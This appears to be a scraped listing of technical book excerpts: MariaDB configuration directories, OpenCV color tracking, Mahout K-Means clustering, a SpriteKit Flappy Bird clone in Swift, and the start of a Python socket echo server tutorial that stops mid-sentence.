exists. The next directory we should know about is where the MariaDB plugins are stored. Unlike the previous two, the location of this directory varies. On Debian and Ubuntu systems, the directory is at the following location: /usr/lib/mysql/plugin/ In distributions such as Fedora, Red Hat, and CentOS, the location of the plugin directory varies depending on whether our system is 32 bit or 64 bit. If unsure, we can just look in both. The possible locations are: /lib64/mysql/plugin//lib/mysql/plugin/ The basic rule of thumb is that if we don't have a /lib64/ directory, we have the 32-bit version of Fedora, Red Hat, or CentOS installed. As with /usr/share/mysql/, we don't need to worry about the contents of the MariaDB plugin directory. It's enough to know that it exists and contains important files. Also, if in the future we install a new MariaDB plugin, this directory is where it will go. The last directory that we should know about is only found on Debian and the distributions based on Debian such as Ubuntu. Its location is as follows: /etc/mysql/ The /etc/mysql/ directory is where the configuration information for MariaDB is stored; specifically, in the following two locations: /etc/mysql/my.cnf/etc/mysql/conf.d/ Fedora, Red Hat, CentOS, and related systems don't have an /etc/mysql/ directory by default, but they do have a my.cnf file and a directory that serves the same purpose that the /etc/mysql/conf.d/ directory does on Debian and Ubuntu. They are at the following two locations: /etc/my.cnf/etc/my.cnf.d/ The my.cnf files, regardless of location, function the same on all Linux versions and on Windows, where it is often named my.ini. The /etc/my.cnf.d/ and /etc/mysql/conf.d/ directories, as mentioned, serve the same purpose. We'll spend the next section going over these two directories. Modular configuration on Linux The /etc/my.cnf.d/ and /etc/mysql/conf.d/ directories are special locations for the MariaDB configuration files. They are found on the MariaDB releases for Linux such as Debian, Ubuntu, Fedora, Red Hat, and CentOS. We will only have one or the other of them, never both, and regardless of which one we have, their function is the same. The basic idea behind these directories is to allow the package manager (APT or YUM) to be able to install packages for MariaDB, which include additions to MariaDB's configuration without needing to edit or change the main my.cnf configuration file. It's easy to imagine the harm that would be caused if we installed a new plugin package and it overwrote a carefully crafted and tuned configuration file. With these special directories, the package manager can simply add a file to the appropriate directory and be done. When the MariaDB server and the clients and utilities included with MariaDB start up, they first read the main my.cnf file and then any files that they find under the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directories that have the extension .cnf because of a line at the end of the default configuration files. For example, MariaDB includes a plugin called feedback whose sole purpose is to send back anonymous statistical information to the MariaDB developers. They use this information to help guide future development efforts. It is disabled by default but can easily be enabled by adding feedback=on to a [mysqld] group of the MariaDB configuration file (we'll talk about configuration groups in the following section). We could add the required lines to our main my.cnf file or, better yet, we can create a file called feedback.cnf (MariaDB doesn't care what the actual filename is, apart from the .cnf extension) with the following content: [mysqld]feedback=on All we have to do is put our feedback.cnf file in the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory and when we start or restart the server, the feedback.cnf file will be read and the plugin will be turned on. Doing this for a single plugin on a solitary MariaDB server may seem like too much work, but suppose we have 100 servers, and further assume that since the servers are doing different things, each of them has a slightly different my.cnf configuration file. Without using our small feedback.cnf file to turn on the feedback plugin on all of them, we would have to connect to each server in turn and manually add feedback=on to the [mysqld] group of the file. This would get tiresome and there is also a chance that we might make a mistake with one, or several of the files that we edit, even if we try to automate the editing in some way. Copying a single file to each server that only does one thing (turning on the feedback plugin in our example) is much faster, and much safer. And, if we have an automated deployment system in place, copying the file to every server can be almost instant. Caution! Because the configuration settings in the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory are read after the settings in the my.cnf file, they can override or change the settings in our main my.cnf file. This can be a good thing if that is what we want and expect. Conversely, it can be a bad thing if we are not expecting that behavior. Summary That's it for our configuration highlights tour! In this article, we've learned where the various bits and pieces of MariaDB are installed and about the different parts that make up a typical MariaDB configuration file. Resources for Article: Building a Web Application with PHP and MariaDB – Introduction to caching Installing MariaDB on Windows and Mac OS X Questions & Answers with MariaDB's Michael "Monty" Widenius- Founder of MySQL AB
Read more
  • 0
  • 0
  • 1861

article-image-color-and-motion-finding
Packt
16 Jun 2015
4 min read
Save for later

Color and motion finding

Packt
16 Jun 2015
4 min read
In this article by Richard Grimmet, the author of the book, Raspberry Pi Robotics Essentials, we'll look at how to detect the Color and motion of an object. (For more resources related to this topic, see here.) OpenCV and your webcam can also track colored objects. This will be useful if you want your biped to follow a colored object. OpenCV makes this amazingly simple by providing some high-level libraries that can help us with this task. To accomplish this, you'll edit a file to look something like what is shown in the following screenshot: Let's look specifically at the code that makes it possible to isolate the colored ball: hue_img = cv.CvtColor(frame, cv.CV_BGR2HSV): This line creates a new image that stores the image as per the values of hue (color), saturation, and value (HSV), instead of the red, green, and blue (RGB) pixel values of the original image. Converting to HSV focuses our processing more on the color, as opposed to the amount of light hitting it. threshold_img = cv.InRangeS(hue_img, low_range, high_range): The low_range, high_range parameters determine the color range. In this case, it is an orange ball, so you want to detect the color orange. For a good tutorial on using hue to specify color, refer to http://www.tomjewett.com/colors/hsb.html. Also, http://www.shervinemami.info/colorConversion.html includes a program that you can use to determine your values by selecting a specific color. Run the program. If you see a single black image, move this window, and you will expose the original image window as well. Now, take your target (in this case, an orange ping-pong ball) and move it into the frame. You should see something like what is shown in the following screenshot: Notice the white pixels in our threshold image showing where the ball is located. You can add more OpenCV code that gives the actual location of the ball. In our original image file of the ball's location, you can actually draw a rectangle around the ball as an indicator. Edit the file to look as follows: The added lines look like the following: hue_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV): This line creates a hue image out of the RGB image that was captured. Hue is easier to deal with when trying to capture real world images; for details, refer to http://www.bogotobogo.com/python/OpenCV_Python/python_opencv3_Changing_ColorSpaces_RGB_HSV_HLS.php. threshold_img = cv2.inRange(hue_image, low_range, high_range): This creates a new image that contains only those pixels that occur between the low_range and high_range n-tuples. contour, hierarchy = cv2.findContours(threshold_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE): This finds the contours, or groups of like pixels, in the threshold_img image. center = contour[0]: This identifies the first contour. moment = cv2.moments(center): This finds the moment of this group of pixels. (x,y),radius = cv2.minEnclosingCircle(center): This gives the x and y locations and the radius of the minimum circle that will enclose this group of pixels. center = (int(x),int(y)): Find the center of the x and y locations. radius = int(radius): The integer radius of the circle. img = cv2.circle(frame,center,radius,(0,255,0),2): Draw a circle on the image. Now that the code is ready, you can run it. You should see something that looks like the following screenshot: You can now track your object. You can modify the color by changing the low_range and high_range n-tuples. You also have the location of your object, so you can use the location to do path planning for your robot. Summary Your biped robot can walk, use sensors to avoid barriers, plans its path, and even see barriers or target. Resources for Article: Further resources on this subject: Develop a Digital Clock [article] Creating Random Insults [article] Raspberry Pi and 1-Wire [article]
Read more
  • 0
  • 0
  • 6191

article-image-clustering
Packt
16 Jun 2015
8 min read
Save for later

Clustering

Packt
16 Jun 2015
8 min read
 In this article by Jayani Withanawasam, author of the book Apache Mahout Essentials, we will see the clustering technique in machine learning and its implementation using Apache Mahout. The K-Means clustering algorithm is explained in detail with both Java and command-line examples (sequential and parallel executions), and other important clustering algorithms, such as Fuzzy K-Means, canopy clustering, and spectral K-Means are also explored. In this article, we will cover the following topics: Unsupervised learning and clustering Applications of clustering Types of clustering K-Means clustering K-Means clustering with MapReduce (For more resources related to this topic, see here.) Unsupervised learning and clustering Information is a key driver for any type of organization. However, with the rapid growth in the volume of data, valuable information may be hidden and go unnoticed due to the lack of effective data processing and analyzing mechanisms. Clustering is an unsupervised learning mechanism that can find the hidden patterns and structures in data by finding data points that are similar to each other. No prelabeling is required. So, you can organize data using clustering with little or no human intervention. For example, let's say you are given a collection of balls of different sizes without any category labels, such as big and small, attached to them; you should be able to categorize them using clustering by considering their attributes, such as radius and weight, for similarity. We will learn how to use Apache Mahout to perform clustering using different algorithms. Applications of clustering Clustering has many applications in different domains, such as biology, business, and information retrieval. Computer vision and image processing Clustering techniques are widely used in the computer vision and image processing domain. Clustering is used for image segmentation in medical image processing for computer aided disease (CAD) diagnosis. One specific area is breast cancer detection. In breast cancer detection, a mammogram is clustered into several parts for further analysis, as shown in the following image. The regions of interest for signs of breast cancer in the mammogram can be identified using the K-Means algorithm. Image features such as pixels, colors, intensity, and texture are used during clustering: Types of clustering Clustering can be divided into different categories based on different criteria. Hard clustering versus soft clustering Clustering techniques can be divided into hard clustering and soft clustering based on the cluster's membership. In hard clustering, a given data point in n-dimensional space only belongs to one cluster. This is also known as exclusive clustering. The K-Means clustering mechanism is an example of hard clustering. A given data point can belong to more than one cluster in soft clustering. This is also known as overlapping clustering. The Fuzzy K-Means algorithm is a good example of soft clustering. A visual representation of the difference between hard clustering and soft clustering is given in the following figure: Flat clustering versus hierarchical clustering In hierarchical clustering, a hierarchy of clusters is built using the top-down (divisive) or bottom-up (agglomerative) approach. This is more informative and accurate than flat clustering, which is a simple technique where no hierarchy is present. However, this comes at the cost of performance, as flat clustering is faster and more efficient than hierarchical clustering. For example, let's assume that you need to figure out T-shirt sizes for people of different sizes. Using hierarchal clustering, you can come up with sizes for small (s), medium (m), and large (l) first by analyzing a sample of the people in the population. Then, we can further categorize this as extra small (xs), small (s), medium, large (l), and extra large (xl) sizes. Model-based clustering In model-based clustering, data is modeled using a standard statistical model to work with different distributions. The idea is to find a model that best fits the data. The best-fit model is achieved by tuning up parameters to minimize loss on errors. Once the parameter values are set, probability membership can be calculated for new data points using the model. Model-based clustering gives a probability distribution over clusters. K-Means clustering K-Means clustering is a simple and fast clustering algorithm that has been widely adopted in many problem domains. We will give a detailed explanation of the K-Means algorithm, as it will provide the base for other algorithms. K-Means clustering assigns data points to k number of clusters (cluster centroids) by minimizing the distance from the data points to the cluster centroids. Let's consider a simple scenario where we need to cluster people based on their size (height and weight are the selected attributes) and different colors (clusters): We can plot this problem in two-dimensional space, as shown in the following figure and solve it using the K-Means algorithm: Getting your hands dirty! Let's move on to a real implementation of the K-Means algorithm using Apache Mahout. The following are the different ways in which you can run algorithms in Apache Mahout: Sequential MapReduce You can execute the algorithms using a command line (by calling the correct bin/mahout subcommand) or using Java programming (calling the correct driver's run method). Running K-Means using Java programming This example continues with the people-clustering scenario mentioned earlier. The size (weight and height) distribution for this example has been plotted in two-dimensional space, as shown in the following image: Data preparation First, we need to represent the problem domain as numerical vectors. The following table shows the size distribution of people mentioned in the previous scenario: Weight (kg) Height (cm) 22 80 25 75 28 85 55 150 50 145 53 153 Save the following content in a file named KmeansTest.data: 22 80 25 75 28 85 55 150 50 145 53 153 Understanding important parameters Let's take a look at the significance of some important parameters: org.apache.hadoop.fs.Path: This denotes the path to a file or directory in the filesystem. org.apache.hadoop.conf.Configuration: This provides access to Hadoop-related configuration parameters. org.apache.mahout.common.distance.DistanceMeasure: This determines the distance between two points. K: This denotes the number of clusters. convergenceDelta: This is a double value that is used to determine whether the algorithm has converged. maxIterations: This denotes the maximum number of iterations to run. runClustering: If this is true, the clustering step is to be executed after the clusters have been determined. runSequential: If this is true, the K-Means sequential implementation is to be used in order to process the input data. The following code snippet shows the source code: private static final String DIRECTORY_CONTAINING_CONVERTED_INPUT ="Kmeansdata";public static void main(String[] args) throws Exception {// Path to output folderPath output = new Path("Kmeansoutput");// Hadoop configuration detailsConfiguration conf = new Configuration();HadoopUtil.delete(conf, output);run(conf, new Path("KmeansTest"), output, newEuclideanDistanceMeasure(), 2, 0.5, 10);}public static void run(Configuration conf, Path input, Pathoutput, DistanceMeasure measure, int k,double convergenceDelta, int maxIterations) throws Exception {// Input should be given as sequence file formatPath directoryContainingConvertedInput = new Path(output,DIRECTORY_CONTAINING_CONVERTED_INPUT);InputDriver.runJob(input, directoryContainingConvertedInput,"org.apache.mahout.math.RandomAccessSparseVector");// Get initial clusters randomlyPath clusters = new Path(output, "random-seeds");clusters = RandomSeedGenerator.buildRandom(conf,directoryContainingConvertedInput, clusters, k, measure);// Run K-Means with a given KKMeansDriver.run(conf, directoryContainingConvertedInput,clusters, output, convergenceDelta,maxIterations, true, 0.0, false);// run ClusterDumper to display resultPath outGlob = new Path(output, "clusters-*-final");Path clusteredPoints = new Path(output,"clusteredPoints");ClusterDumper clusterDumper = new ClusterDumper(outGlob,clusteredPoints);clusterDumper.printClusters(null);} Use the following code example in order to get a better (readable) outcome to analyze the data points and the centroids they are assigned to: Reader reader = new SequenceFile.Reader(fs,new Path(output,Cluster.CLUSTERED_POINTS_DIR + "/part-m-00000"), conf);IntWritable key = new IntWritable();WeightedPropertyVectorWritable value = newWeightedPropertyVectorWritable();while (reader.next(key, value)) {System.out.println("key: " + key.toString()+ " value: "+value.toString());}reader.close(); After you run the algorithm, you will see the clustering output generated for each iteration and the final result in the filesystem (in the output directory you have specified; in this case, Kmeansoutput). Summary Clustering is an unsupervised learning mechanism that requires minimal human effort. Clustering has many applications in different areas, such as medical image processing, market segmentation, and information retrieval. Clustering mechanisms can be divided into different types, such as hard, soft, flat, hierarchical, and model-based clustering based on different criteria. Apache Mahout implements different clustering algorithms, which can be accessed sequentially or in parallel (using MapReduce). The K-Means algorithm is a simple and fast algorithm that is widely applied. However, there are situations that the K-Means algorithm will not be able to cater to. For such scenarios, Apache Mahout has implemented other algorithms, such as canopy, Fuzzy K-Means, streaming, and spectral clustering. Resources for Article: Further resources on this subject: Apache Solr and Big Data – integration with MongoDB [Article] Introduction to Apache ZooKeeper [Article] Creating an Apache JMeter™ test workbench [Article]
Read more
  • 0
  • 0
  • 2887
article-image-flappy-swift
Packt
16 Jun 2015
15 min read
Save for later

Flappy Swift

Packt
16 Jun 2015
15 min read
Let's start using the first framework by implementing a nice clone of Flappy Bird with the help of this article by Giordano Scalzo, the author of Swift by Example. (For more resources related to this topic, see here.) The app is… Only someone who has been living under a rock for the past two years may not have heard of Flappy Bird, but to be sure that everybody understands the game, let's go through a brief introduction. Flappy Bird is a simple, but addictive, game where the player controls a bird that must fly between a series of pipes. Gravity pulls the bird down, but by touching the screen, the player can make the bird flap and move towards the sky, driving the bird through a gap in a couple of pipes. The goal is to pass through as many pipes as possible. Our implementation will be a high-fidelity tribute to the original game, with the same simplicity and difficulty level. The app will consist of only two screens—a clean menu screen and the game itself—as shown in the following screenshot:   Building the skeleton of the app Let's start implementing the skeleton of our game using the SpriteKit game template. Creating the project For implementing a SpriteKit game, Xcode provides a convenient template, which prepares a project with all the useful settings: Go to New| Project and select the Game template, as shown in this screenshot: In the following screen, after filling in all the fields, pay attention and select SpriteKit under Game Technology, like this: By running the app and touching the screen, you will be delighted by the cute, rotating airplanes! Implementing the menu First of all, let's add CocoaPods; write the following code in the Podfile: use_frameworks!   target 'FlappySwift' do pod 'Cartography', '~> 0.5' pod 'HTPressableButton', '~> 1.3' end Then install CocoaPods by running the pod install command. As usual, we are going to implement the UI without using Interface Builder and the storyboards. Go to AppDelegate and add these lines to create the main ViewController:    func application(application: UIApplication, didFinishLaunchingWithOptions launchOptions: [NSObject: AnyObject]?) -> Bool {        let viewController = MenuViewController()               let mainWindow = UIWindow(frame: UIScreen.mainScreen().bounds)        mainWindow.backgroundColor = UIColor.whiteColor()       mainWindow.rootViewController = viewController        mainWindow.makeKeyAndVisible()        window = mainWindow          return true    } The MenuViewController, as the name suggests, implements a nice menu to choose between the game and the Game Center: import UIKit import HTPressableButton import Cartography   class MenuViewController: UIViewController {    private let playButton = HTPressableButton(frame: CGRectMake(0, 0, 260, 50), buttonStyle: .Rect)    private let gameCenterButton = HTPressableButton(frame: CGRectMake(0, 0, 260, 50), buttonStyle: .Rect)      override func viewDidLoad() {        super.viewDidLoad()        setup()        layoutView()        style()        render()    } } As you can see, we are using the usual structure. Just for the sake of making the UI prettier, we are using HTPressableButtons instead of the default buttons. Despite the fact that we are using AutoLayout, the implementation of this custom button requires that we instantiate the button by passing a frame to it: // MARK: Setup private extension MenuViewController{    func setup(){        playButton.addTarget(self, action: "onPlayPressed:", forControlEvents: .TouchUpInside)        view.addSubview(playButton)        gameCenterButton.addTarget(self, action: "onGameCenterPressed:", forControlEvents: .TouchUpInside)        view.addSubview(gameCenterButton)    }       @objc func onPlayPressed(sender: UIButton) {        let vc = GameViewController()        vc.modalTransitionStyle = .CrossDissolve        presentViewController(vc, animated: true, completion: nil)    }       @objc func onGameCenterPressed(sender: UIButton) {        println("onGameCenterPressed")    }   } The only thing to note is that, because we are setting the function to be called when the button is pressed using the addTarget() function, we must prefix the designed methods using @objc. Otherwise, it will be impossible for the Objective-C runtime to find the correct method when the button is pressed. This is because they are implemented in a private extension; of course, you can set the extension as internal or public and you won't need to prepend @objc to the functions: // MARK: Layout extension MenuViewController{    func layoutView() {        layout(playButton) { view in             view.bottom == view.superview!.centerY - 60            view.centerX == view.superview!.centerX            view.height == 80            view.width == view.superview!.width - 40        }        layout(gameCenterButton) { view in            view.bottom == view.superview!.centerY + 60            view.centerX == view.superview!.centerX            view.height == 80            view.width == view.superview!.width - 40        }    } } The layout functions simply put the two buttons in the correct places on the screen: // MARK: Style private extension MenuViewController{    func style(){        playButton.buttonColor = UIColor.ht_grapeFruitColor()        playButton.shadowColor = UIColor.ht_grapeFruitDarkColor()        gameCenterButton.buttonColor = UIColor.ht_aquaColor()        gameCenterButton.shadowColor = UIColor.ht_aquaDarkColor()    } }   // MARK: Render private extension MenuViewController{    func render(){        playButton.setTitle("Play", forState: .Normal)        gameCenterButton.setTitle("Game Center", forState: .Normal)    } } Finally, we set the colors and text for the titles of the buttons. The following screenshot shows the complete menu: You will notice that on pressing Play, the app crashes. This is because the template is using the view defined in storyboard, and we are directly using the controllers. Let's change the code in GameViewController: class GameViewController: UIViewController {    private let skView = SKView()      override func viewDidLoad() {        super.viewDidLoad()        skView.frame = view.bounds        view.addSubview(skView)        if let scene = GameScene.unarchiveFromFile("GameScene") as? GameScene {            scene.size = skView.frame.size            skView.showsFPS = true            skView.showsNodeCount = true            skView.ignoresSiblingOrder = true            scene.scaleMode = .AspectFill            skView.presentScene(scene)        }    } } We are basically creating the SKView programmatically, and setting its size just as we did for the main view's size. If the app is run now, everything will work fine. You can find the code for this version at https://github.com/gscalzo/FlappySwift/tree/the_menu_is_ready. A stage for a bird Let's kick-start the game by implementing the background, which is not as straightforward as it might sound. SpriteKit in a nutshell SpriteKit is a powerful, but easy-to-use, game framework introduced in iOS 7. It basically provides the infrastructure to move images onto the screen and interact with them. It also provides a physics engine (based on Box2D), a particles engine, and basic sound playback support, making it particularly suitable for casual games. The content of the game is drawn inside an SKView, which is a particular kind of UIView, so it can be placed inside a normal hierarchy of UIViews. The content of the game is organized into scenes, represented by subclasses of SKScene. Different parts of the game, such as the menu, levels, and so on, must be implemented in different SKScenes. You can consider an SK in SpriteKit as an equivalent of the UIViewController. Inside an SKScene, the elements of the game are grouped in the SKNode's tree which tells the SKScene how to render the components. An SKNode can be either a drawable node, such as SKSpriteNode or SKShapeNode; or something to be applied to the subtree of its descendants, such as SKEffectNode or SKCropNode. Note that SKScene is an SKNode itself. Nodes are animated using SKAction. An SKAction is a change that must be applied to a node, such as a move to a particular position, a change of scaling, or a change in the way the node appears. The actions can be grouped together to create actions that run in parallel, or wait for the end of a previous action. Finally, we can define physics-based relations between objects, defining mass, gravity, and how the nodes interact with each other. That said, the best way to understand and learn SpriteKit is by starting to play with it. So, without further ado, let's move on to the implementation of our tiny game. In this way, you'll get a complete understanding of the most important features of SpriteKit. Explaining the code In the previous section, we implemented the menu view, leaving the code similar to what was created by the template. With basic knowledge of SpriteKit, you can now start understanding the code: class GameViewController: UIViewController {    private let skView = SKView()      override func viewDidLoad() {        super.viewDidLoad()        skView.frame = view.bounds        view.addSubview(skView)        if let scene = GameScene.unarchiveFromFile("GameScene") as? GameScene {            scene.size = skView.frame.size            skView.showsFPS = true            skView.showsNodeCount = true            skView.ignoresSiblingOrder = true            scene.scaleMode = .AspectFill            skView.presentScene(scene)        }    } } This is the UIViewController that starts the game; it creates an SKView to present the full screen. Then it instantiates the scene from GameScene.sks, which can be considered the equivalent of a Storyboard. Next, it enables some debug information before presenting the scene. It's now clear that we must implement the game inside the GameScene class. Simulating a three-dimensional world using parallax To simulate the depth of the in-game world, we are going to use the technique of parallax scrolling, a really popular method wherein the farther images on the game screen move slower than the closer images. In our case, we have three different levels, and we'll use three different speeds: Before implementing the scrolling background, we must import the images into our project, remembering to set each image as 2x in the assets. The assets can be downloaded from https://github.com/gscalzo/FlappySwift/blob/master/assets.zip?raw=true. The GameScene class basically sets up the background levels: import SpriteKit   class GameScene: SKScene {    private var screenNode: SKSpriteNode!    private var actors: [Startable]!      override func didMoveToView(view: SKView) {        screenNode = SKSpriteNode(color: UIColor.clearColor(), size: self.size)        addChild(screenNode)        let sky = Background(textureNamed: "sky", duration:60.0).addTo(screenNode)        let city = Background(textureNamed: "city", duration:20.0).addTo(screenNode)        let ground = Background(textureNamed: "ground", duration:5.0).addTo(screenNode)        actors = [sky, city, ground]               for actor in actors {            actor.start()        }    } } The only implemented function is didMoveToView(), which can be considered the equivalent of viewDidAppear for a UIVIewController. We define an array of Startable objects, where Startable is a protocol for making the life cycle of the scene, uniform: import SpriteKit   protocol Startable {    func start()    func stop() } This will be handy for giving us an easy way to stop the game later, when either we reach the final goal or our character dies. The Background class holds the behavior for a scrollable level: import SpriteKit   class Background {    private let parallaxNode: ParallaxNode    private let duration: Double      init(textureNamed textureName: String, duration: Double) {        parallaxNode = ParallaxNode(textureNamed: textureName)        self.duration = duration    }       func addTo(parentNode: SKSpriteNode) -> Self {        parallaxNode.addTo(parentNode)        return self    } } As you can see, the class saves the requested duration of a cycle, and then it forwards the calls to a class called ParallaxNode: // Startable extension Background : Startable {    func start() {        parallaxNode.start(duration: duration)    }       func stop() {        parallaxNode.stop()    } } The Startable protocol is implemented by forwarding the methods to ParallaxNode. How to implement the scrolling The idea of implementing scrolling is really straightforward: we implement a node where we put two copies of the same image in a tiled format. We then place the node such that we have the left half fully visible. Then we move the entire node to the left until we fully present the left node. Finally, we reset the position to the original one and restart the cycle. The following figure explains this algorithm: import SpriteKit   class ParallaxNode {    private let node: SKSpriteNode!       init(textureNamed: String) {        let leftHalf = createHalfNodeTexture(textureNamed, offsetX: 0)        let rightHalf = createHalfNodeTexture(textureNamed, offsetX: leftHalf.size.width)               let size = CGSize(width: leftHalf.size.width + rightHalf.size.width,            height: leftHalf.size.height)               node = SKSpriteNode(color: UIColor.whiteColor(), size: size)        node.anchorPoint = CGPointZero        node.position = CGPointZero        node.addChild(leftHalf)        node.addChild(rightHalf)    }       func zPosition(zPosition: CGFloat) -> ParallaxNode {        node.zPosition = zPosition        return self    }       func addTo(parentNode: SKSpriteNode) -> ParallaxNode {        parentNode.addChild(node)        return self    }   } The init() method simply creates the two halves, puts them side by side, and sets the position of the node: // Mark: Private private func createHalfNodeTexture(textureNamed: String, offsetX: CGFloat) -> SKSpriteNode {    let node = SKSpriteNode(imageNamed: textureNamed,                            normalMapped: true)    node.anchorPoint = CGPointZero    node.position = CGPoint(x: offsetX, y: 0)    return node } The half node is just a node with the correct offset for the x-coordinate: // Mark: Startable extension ParallaxNode {    func start(#duration: NSTimeInterval) {        node.runAction(SKAction.repeatActionForever(SKAction.sequence(            [                SKAction.moveToX(-node.size.width/2.0, duration: duration),                SKAction.moveToX(0, duration: 0)            ]            )))    }       func stop() {        node.removeAllActions()    } } Finally, the Startable protocol is implemented using two actions in a sequence. First, we move half the size—which means an image width—to the left, and then we move the node to the original position to start the cycle again. This is what the final result looks like: You can find the code for this version at https://github.com/gscalzo/FlappySwift/tree/stage_with_parallax_levels. Summary This article has given an idea on how to go about direction that you need to build a clone of the Flappy Bird app. For the complete exercise and a lot more, please refer to Swift by Example by Giordano Scalzo. Resources for Article: Further resources on this subject: Playing with Swift [article] Configuring Your Operating System [article] Updating data in the background [article]
Read more
  • 0
  • 0
  • 8063

article-image-client-and-server-applications
Packt
16 Jun 2015
27 min read
Save for later

Client and Server Applications

Packt
16 Jun 2015
27 min read
In this article by, Sam Washington and Dr. M. O. Faruque Sarker, authors of the book Learning Python Network Programming, we're going to use sockets to build network applications. Sockets follow one of the main models of computer networking, that is, the client/server model. We'll look at this with a focus on structuring server applications. We'll cover the following topics: Designing a simple protocol Building an echo server and client (For more resources related to this topic, see here.) The examples in this article are best run on Linux or a Unix operating system. The Windows sockets implementation has some idiosyncrasies, and these can create some error conditions, which we will not be covering here. Note that Windows does not support the poll interface that we'll use in one example. If you do use Windows, then you'll probably need to use ctrl + break to kill these processes in the console, rather than using ctrl - c because Python in a Windows command prompt doesn't respond to ctrl – c when it's blocking on a socket send or receive, which will be quite often in this article! (and if, like me, you're unfortunate enough to try testing these on a Windows laptop without a break key, then be prepared to get very familiar with the Windows Task Manager's End task button). Client and server The basic setup in the client/server model is one device, the server that runs a service and patiently waits for clients to connect and make requests to the service. A 24-hour grocery shop may be a real world analogy. The shop waits for customers to come in and when they do, they request certain products, purchase them and leave. The shop might advertise itself so people know where to find it, but the actual transactions happen while the customers are visiting the shop. A typical computing example is a web server. The server listens on a TCP port for clients that need its web pages. When a client, for example a web browser, requires a web page that the server hosts, it connects to the server and then makes a request for that page. The server replies with the content of the page and then the client disconnects. The server advertises itself by having a hostname, which the clients can use to discover the IP address so that they can connect to it. In both of these situations, it is the client that initiates any interaction – the server is purely responsive to that interaction. So, the needs of the programs that run on the client and server are quite different. Client programs are typically oriented towards the interface between the user and the service. They retrieve and display the service, and allow the user to interact with it. Server programs are written to stay running for indefinite periods of time, to be stable, to efficiently deliver the service to the clients that are requesting it, and to potentially handle a large number of simultaneous connections with a minimal impact on the experience of any one client. In this article, we will look at this model by writing a simple echo server and client, which can handle a session with multiple clients. The socket module in Python perfectly suits this task. An echo protocol Before we write our first client and server programs, we need to decide how they are going to interact with each other, that is we need to design a protocol for their communication. Our echo server should listen until a client connects and sends a bytes string, then we want it to echo that string back to the client. We only need a few basic rules for doing this. These rules are as follows: Communication will take place over TCP. The client will initiate an echo session by creating a socket connection to the server. The server will accept the connection and listen for the client to send a bytes string. The client will send a bytes string to the server. Once it sends the bytes string, the client will listen for a reply from the server When it receives the bytes string from the client, the server will send the bytes string back to the client. When the client has received the bytes string from the server, it will close its socket to end the session. These steps are straightforward enough. The missing element here is how the server and the client will know when a complete message has been sent. Remember that an application sees a TCP connection as an endless stream of bytes, so we need to decide what in that byte stream will signal the end of a message. Framing This problem is called framing, and there are several approaches that we can take to handle it. The main ones are described here: Make it a protocol rule that only one message will be sent per connection, and once a message has been sent, the sender will immediately close the socket. Use fixed length messages. The receiver will read the number of bytes and know that they have the whole message. Prefix the message with the length of the message. The receiver will read the length of the message from the stream first, then it will read the indicated number of bytes to get the rest of the message. Use special character delimiters for indicating the end of a message. The receiver will scan the incoming stream for a delimiter, and the message comprises everything up to the delimiter. Option 1 is a good choice for very simple protocols. It's easy to implement and it doesn't require any special handling of the received stream. However, it requires the setting up and tearing down of a socket for every message, and this can impact performance when a server is handling many messages at once. Option 2 is again simple to implement, but it only makes efficient use of the network when our data comes in neat, fixed-length blocks. For example in a chat server the message lengths are variable, so we will have to use a special character, such as the null byte, to pad messages to the block size. This only works where we know for sure that the padding character will never appear in the actual message data. There is also the additional issue of how to handle messages longer than the block length. Option 3 is usually considered as one of the best approaches. Although it can be more complex to code than the other options, the implementations are still reasonably straightforward, and it makes efficient use of bandwidth. The overhead imposed by including the length of each message is usually minimal as compared to the message length. It also avoids the need for any additional processing of the received data, which may be needed by certain implementations of option 4. Option 4 is the most bandwidth-efficient option, and is a good choice when we know that only a limited set of characters, such as the ASCII alphanumeric characters, will be used in messages. If this is the case, then we can choose a delimiter character, such as the null byte, which will never appear in the message data, and then the received data can be easily broken into messages as this character is encountered. Implementations are usually simpler than option 3. Although it is possible to employ this method for arbitrary data, that is, where the delimiter could also appear as a valid character in a message, this requires the use of character escaping, which needs an additional round of processing of the data. Hence in these situations, it's usually simpler to use length-prefixing. For our echo and chat applications, we'll be using the UTF-8 character set to send messages. The null byte isn't used in any character in UTF-8 except for the null byte itself, so it makes a good delimiter. Thus, we'll be using method 4 with the null byte as the delimiter to frame our messages. So, our last rule which is number 8 will become: Messages will be encoded in the UTF-8 character set for transmission, and they will be terminated by the null byte. Now, let's write our echo programs. A simple echo server As we work through this article, we'll find ourselves reusing several pieces of code, so to save ourselves from repetition, we'll set up a module with useful functions that we can reuse as we go along. Create a file called tincanchat.py and save the following code in it: import socket   HOST = '' PORT = 4040   def create_listen_socket(host, port):    """ Setup the sockets our server will receive connection requests on """    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)    sock.bind((host, port))    sock.listen(100)    return sock   def recv_msg(sock):    """ Wait for data to arrive on the socket, then parse into messages using b' ' as message delimiter """    data = bytearray()    msg = ''    # Repeatedly read 4096 bytes off the socket, storing the bytes    # in data until we see a delimiter    while not msg:        recvd = sock.recv(4096)        if not recvd:            # Socket has been closed prematurely            raise ConnectionError()        data = data + recvd        if b' ' in recvd:            # we know from our protocol rules that we only send            # one message per connection, so b' ' will always be            # the last character            msg = data.rstrip(b' ')    msg = msg.decode('utf-8')    return msg   def prep_msg(msg):    """ Prepare a string to be sent as a message """    msg += ' '    return msg.encode('utf-8')   def send_msg(sock, msg):    """ Send a string over a socket, preparing it first """    data = prep_msg(msg)    sock.sendall(data) First we define a default interface and a port number to listen on. The empty '' interface, specified in the HOST variable, tells socket.bind() to listen on all available interfaces. If you want to restrict access to just your machine, then change the value of the HOST variable at the beginning of the code to 127.0.0.1. We'll be using create_listen_socket() to set up our server listening connections. This code is the same for several of our server programs, so it makes sense to reuse it. The recv_msg() function will be used by our echo server and client for receiving messages from a socket. In our echo protocol, there isn't anything that our programs may need to do while they're waiting to receive a message, so this function just calls socket.recv() in a loop until it has received the whole message. As per our framing rule, it will check the accumulated data on each iteration to see if it has received a null byte, and if so, then it will return the received data, stripping off the null byte and decoding it from UTF-8. The send_msg() and prep_msg() functions work together for framing and sending a message. We've separated the null byte termination and the UTF-8 encoding into prep_msg() because we will use them in isolation later on. Handling received data Note that we're drawing ourselves a careful line with these send and receive functions as regards string encoding. Python 3 strings are Unicode, while the data that we receive over the network is 